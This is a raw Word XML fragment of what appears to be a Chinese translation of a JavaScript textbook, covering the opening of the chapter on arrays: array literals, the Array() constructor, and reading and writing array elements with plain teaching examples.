      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>a.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="Di_7Zhang__Shu_Zu_"/>
      <w:bookmarkStart w:id="162" w:name="Di_7Zhang__Shu_Zu_____Shu_Zu_Shi_Zhi_De_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章　数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组是值的有序集合。每个值叫做一个元素，而每个元素在数组中有一个位置，以数字表示，称为索引。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组是无类型的：数组元素可以是任意类型，并且同一个数组中的不同元素也可能有不同的类型。数组的元素甚至也可能是对象或其他数组，这允许创建复杂的数据结构，如对象的数组和数组的数组。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组的索引是基于零的</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位数值：第一个元素的索引为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，最大可能的索引为</w:t>
      </w:r>
      <w:r>
        <w:t>4 294 967 294</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>），数组最大能容纳</w:t>
      </w:r>
      <w:r>
        <w:t>4 294 967 295</w:t>
      </w:r>
      <w:r>
        <w:t>个元</w:t>
      </w:r>
      <w:r>
        <w:t>素。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组是动态的：根据需要它们会增长或缩减，并且在创建数组时无须声明一个固定的大小或者在数组大小变化时无须重新分配空间。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组可能是稀疏的：数组元素的索引不一定要连续的，它们之间可以有空缺。每个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性。针对非稀疏数组，该属性就是数组元素的个数。针对稀疏数组，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>比所有元素的索引要大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象的特殊形式，数组索引实际上和碰巧是整数的属性名差不多。我们将在本章的其他地方更多地讨论特</w:t>
      </w:r>
      <w:r>
        <w:t>殊化的数组。通常，数组的实现是经过优化的，用数字索引来访问数组元素一般来说比访问常规的对象属性要快很多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数组继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性，它定义了一套丰富的数组操作方法，</w:t>
      </w:r>
      <w:r>
        <w:t>7.8</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖这方面内容。大多数这些方法是通用的，这意味着它们不仅对真正的数组有效，而且对</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>同样有效。</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论类数组对象。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，字符串的行为与字符数组类似，我们将在</w:t>
      </w:r>
      <w:r>
        <w:t>7.12</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="7_1_Chuang_Jian_Shu_Zu_"/>
      <w:r>
        <w:t>7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　创建数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用数组直接量是创建数组最简单的方法，在方括号中将数组元素用逗号隔开即可。</w:t>
      </w:r>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var empty=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>没有元素的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var primes=[2,3,5,7,11];//</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个数值的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var misc=[1.1,true,"a",];//3</w:t>
      </w:r>
      <w:r>
        <w:t>个不同类型的元素和结尾的逗号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组直接量中的值不一定要是常量；它们可以是任意的表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var base=1024;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var table=[base,base+1,base+2,base+3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>它可以包含对象直接量或其他数组直接量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=[[1,{x:1,y:2}],[2,{x:3,y:4}]];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果省略数组直接量中的某个值，省略的元素将被赋予</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var count=[1,,3];//</w:t>
      </w:r>
      <w:r>
        <w:t>数组有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，中间的那个元素值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var undefs=[,,];//</w:t>
      </w:r>
      <w:r>
        <w:t>数组有</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，都是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组直接量的语法允许有可选的结尾的逗号，故</w:t>
      </w:r>
      <w:r>
        <w:t>[,,]</w:t>
      </w:r>
      <w:r>
        <w:t>只有两个元素而非三个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用构造函数</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>是创建数组的另一种方法。可以用三种方式调用构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>调用时没有参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Array();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该方法创建一个没有任何元素的空数组，等同于数组直接量</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>调用时有一个数值参数，它指定长度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Array(10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该技术创建指定长度的数组。当预先知道所需元素个数时，这种形式的</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数可以用来预分配一个数组空间。注意，数组中没有存储值，甚至数组的索引属性</w:t>
      </w:r>
      <w:r>
        <w:t>“0”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“1”</w:t>
      </w:r>
      <w:r>
        <w:t>等还未定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>显式指定两个或多个数组元素或者数组的一个非数值元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Array(5,4,3,2,1,"testing,testing");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以这种形式，构造函数的参数将会成为</w:t>
      </w:r>
      <w:r>
        <w:t>新数组的元素。使用数组字面量比这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数要简单多了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="7_2_Shu_Zu_Yuan_Su_De_Du_He_Xie_"/>
      <w:r>
        <w:t>7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组元素的读和写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来访问数组中的一个元素。数组的引用位于方括号的左边。方括号中是一个返回非负整数值的任意表达式。使用该语法既可以读又可以写数组的一个元素。因此，如下代码都是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=["world"];//</w:t>
      </w:r>
      <w:r>
        <w:t>从一个元素的数组开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=a[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>读第</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[1]=3.14;//</w:t>
      </w:r>
      <w:r>
        <w:t>写第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[i]=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>写第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[i+1]="hello";//</w:t>
      </w:r>
      <w:r>
        <w:t>写第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[a[i]]=a[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>读第</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个和第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，写第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请记住，数组是对象的特殊形式。使用方括号访问数组元素就像用方括号访问对象的属性一样。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将指定的数字索引值转换成字符串</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>索引值</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>变成</w:t>
      </w:r>
      <w:r>
        <w:t>“1”——</w:t>
      </w:r>
      <w:r>
        <w:t>然后将其作为属性名来使用。关于索引值从数字转换为字符串没什么特别之处：对常规对象也可以这么做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o={};//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个普通的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o[1]="one";//</w:t>
      </w:r>
      <w:r>
        <w:t>用一个整数来索引它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的特别之处在于，当使用小于</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>的非负整数作为属性名</w:t>
      </w:r>
      <w:r>
        <w:t>时数组会自动维护其</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。如上，创建仅有一个元素的数组。然后在索引</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>处分别进行赋值。当我们这么做时数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值变为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清晰地区分数组的索引和对象的属性名是非常有用的。所有的索引都是属性名，但只有在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数属性名才是索引。所有的数组都是对象，可以为其创建任意名字的属性。但如果使用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的属性是数组的索引，数组的特殊行为就是将根据需要更新它们的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，可以使用负数或非整数来索引数组。这种情况下，数值转换为字符串，字符串</w:t>
      </w:r>
      <w:r>
        <w:t>作为属性名来用。既然名字不是非负整数，它就只能当做常规的对象属性，而非数组的索引。同样，如果凑巧使用了是非负整数的字符串，它就当做数组索引，而非对象属性。当使用的一个浮点数和一个整数相等时情况也是一样的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[-1.23]=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>这将创建一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>"-1.23"</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a["1000"]=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是数组的第</w:t>
      </w:r>
      <w:r>
        <w:t>1001</w:t>
      </w:r>
      <w:r>
        <w:t>个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[1.000]//</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>a[1]</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事实上数组索引仅仅是对象属性名的一种特殊类型，这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组没有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>越界</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>错误的概念。当试图查询任何对象中不存在的属性时，不</w:t>
      </w:r>
      <w:r>
        <w:t>会报错，只会得到</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值。类似于对象，对于对象同样存在这种情况。</w:t>
      </w:r>
    </w:p>
